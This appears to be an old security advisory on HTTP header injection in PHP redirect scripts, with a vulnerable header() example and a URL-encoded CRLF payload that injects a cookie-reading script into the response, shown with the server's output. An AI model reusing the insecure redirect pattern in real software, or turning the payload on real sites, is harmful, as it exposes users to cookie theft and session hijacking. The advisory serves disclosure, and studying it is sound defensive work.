|
Brought to you by:
Suppliers of:
|
|
|
| |
| A security vulnerability in the way certain PHP scripts handle incoming URLs allows attackers to cause it to display malicious HTML and JavaScript code as if it were its own. The following is a theoretical example. |
| |
Credit:
The information has been provided by Matthew Murphy.
|
| |
PHP's header() function is used to modify HTTP header information by specifying a header line, such as this:
<?php header("Location: http://www.yahoo.com/"); ?>
It is commonplace to see things such as this:
--- REDIR.PHP ---
<?php header("Location: $_GET['$url']"); ?>
--- REDIR.PHP ---
http://localhost/redir.php?url=%68%74%74%70%3A%2F%2F%77%77%77%2E%79%61%68%6F
%6F%2E%63%6F%6D%2F%0D%0A%0D%0A%3C%53%43%52%49%50%54%3E%61%6C%65%72%74%28%64%
6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%53%43%52%49%50%54%3E%3C%2
1%2D%2D
Will cause a series of lines to be produced:
HTTP/1.1 302 Found
Server: Xitami
Date: Sat, 07 Sep 2002 21:50:17 GMT
Content-length: 96
Content-type: text/html
X-powered-by: PHP/4.2.3
{Location: http://www.yahoo.com/
<SCR!PT>alert(document.cookie)</SCRIPT><!--} <-- See our code in between the brackets
Content-type: text/html
The HTML produced is "broken" -- that is, it does not comply to RFC standards, because it does not have a "-->" tag. Matthew did this to suppress the "Content-type" header that PHP was dumping in the response.
By using this, attackers can perform cross-site scripting attacks or initiate downloads, in rare cases (via HTTP headers, such as content-dispostion, etc.)
|
|
|
|
|
